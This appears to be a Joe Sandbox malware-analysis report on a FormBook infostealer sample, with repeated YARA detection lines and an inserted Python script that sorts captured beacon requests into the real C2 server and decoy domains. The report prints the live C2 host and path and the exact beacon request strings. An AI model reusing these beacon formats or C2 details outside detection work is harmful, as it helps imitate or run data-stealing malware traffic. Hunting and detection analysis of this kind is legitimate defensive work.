Source: C:\Users\user\Desktop\2022-571-GLS.exe | Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
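The three captured GETs share one path (/b31b/), one request shape (two query parameters, no User-Agent, Connection: close, a seven-byte NUL body) and an identical second parameter (q0DDzX=YreDi), while only one of the three hosts is in the extracted C2 list; the other two are decoys from the configuration. The Python below is an added triage example, not part of the Joe Sandbox report: it parses the requests, separates the real C2 from the decoys using the extracted configuration, and derives the constant part of the beacon as a proxy-log pivot. The raw request text is rebuilt from the report's lines; the shortened decoy list and the benign control request are constructed.

```python
"""Triage the report's HTTP requests against the extracted FormBook config.

FormBook rotates one request shape through decoy domains and the real C2;
this separates the two and derives a pivot for proxy-log hunting.
"""

# From the report's Malware Configuration Extractor output. The C2 entry is
# verbatim; the decoy list is cut to a handful of the report's 64 entries.
CONFIG = {
    "C2 list": ["www.cdlcapitolsolutions.com/b31b/"],
    "decoy": ["deltafxtrading.com", "alisonangl.com", "cdfqs.com", "easyentry.vip",
              "dentalinfodomain.com", "hiphoppianyc.com", "fulili.com", "crgabions.com",
              "supplierdir.com", "counterpoint.online", "zarl.tech"],
}


def _raw(host, query):
    # Constructed wire format for the report's "HTTP traffic detected" lines:
    # the logged header set and the seven NUL bytes of body.
    return (f"GET /b31b/?{query} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
            + "\x00" * 7)


REQUESTS = [
    _raw("www.cdlcapitolsolutions.com",
         "8pq=gR42Xd1117OgJS+Outh2bFri+uyQrgf7E7TvWkJgQJ6aRmKfoh8EdM/DtT372TknNdyW&q0DDzX=YreDi"),
    _raw("www.easyentry.vip",
         "8pq=kQFV/3Ti5731GiKzPcF+l7m9iVSkkn86bXlgwK5ZhVk2Z3fCEdzJJK3qVV3FyS9CSUee&q0DDzX=YreDi"),
    _raw("www.fulili.com",
         "8pq=tdO7S/Z/VqUa/I2xC15i+El5qu+HGrTkpc7PSFUM9PDChnmIJTvvTeLkqdaOGaksChda&q0DDzX=YreDi"),
]

# Constructed benign control: a browser hitting a decoy domain with a UA.
BENIGN = ("GET /b31b/?a=1&b=2 HTTP/1.1\r\nHost: www.fulili.com\r\n"
          "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n")


def parse_request(raw):
    """Minimal HTTP/1.1 request parser. The query is split by hand rather than
    with urllib.parse.parse_qsl, which would turn the '+' inside the encoded
    payload into spaces and corrupt the indicator."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    path, _, query = target.partition("?")
    params = [tuple(p.split("=", 1)) if "=" in p else (p, "") for p in query.split("&") if p]
    return {"method": method, "path": path, "params": params, "headers": headers, "body": body}


def c2_paths(config):
    """Map C2 host -> path from entries like 'www.host.tld/b31b/'."""
    out = {}
    for entry in config["C2 list"]:
        host, _, path = entry.partition("/")
        out[host.lower()] = "/" + path
    return out


def classify_host(host, config):
    host = host.lower()
    bare = host[4:] if host.startswith("www.") else host
    if host in c2_paths(config):
        return "c2"
    if bare in {d.lower() for d in config["decoy"]}:
        return "decoy"
    return "unknown"


def is_formbook_beacon(req, config):
    """Request shape seen in the report: GET to a configured C2 path, exactly
    two query parameters, no User-Agent, Connection: close."""
    h = req["headers"]
    return (req["method"] == "GET" and req["path"] in set(c2_paths(config).values())
            and len(req["params"]) == 2 and "user-agent" not in h
            and h.get("connection", "").lower() == "close")


def triage(raw_requests, config):
    rows = []
    for raw in raw_requests:
        req = parse_request(raw)
        host = req["headers"].get("host", "")
        rows.append({"host": host, "verdict": classify_host(host, config),
                     "beacon": is_formbook_beacon(req, config)})
    return rows


def beacon_fingerprint(raw_requests):
    """(path, parameters) common to every request: the stable part of the
    beacon, usable as a proxy-log search across decoys and C2 alike."""
    reqs = [parse_request(r) for r in raw_requests]
    paths = {r["path"] for r in reqs}
    common = set(reqs[0]["params"])
    for r in reqs[1:]:
        common &= set(r["params"])
    return (paths.pop() if len(paths) == 1 else None, sorted(common))


if __name__ == "__main__":
    for row in triage(REQUESTS, CONFIG):
        print(f"{row['host']:32} {row['verdict']:8} beacon={row['beacon']}")
    print("pivot:", beacon_fingerprint(REQUESTS))
```

Blocking the decoy domains is pointless (they are real, unrelated sites); the actionable outputs are the C2 host plus path and the request shape, which together catch the beacon whichever host it is sent to.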

          E-Banking Fraud

Source: Yara match | File source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          System Summary

Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.562589613.0000000002E20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.562707442.0000000002E50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.381071998.0000000001090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: jsqqecy.exe PID: 1236, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: jsqqecy.exe PID: 1224, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: netsh.exe PID: 6140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 2022-571-GLS.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.jsqqecy.exe.1090000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jsqqecy.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.jsqqecy.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.jsqqecy.exe.1090000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.jsqqecy.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.jsqqecy.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.381040455.0000000001060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.300703858.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.304792498.0000000001090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.380708027.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.352626169.000000000DF14000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000004.00000002.562405405.0000000002930000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
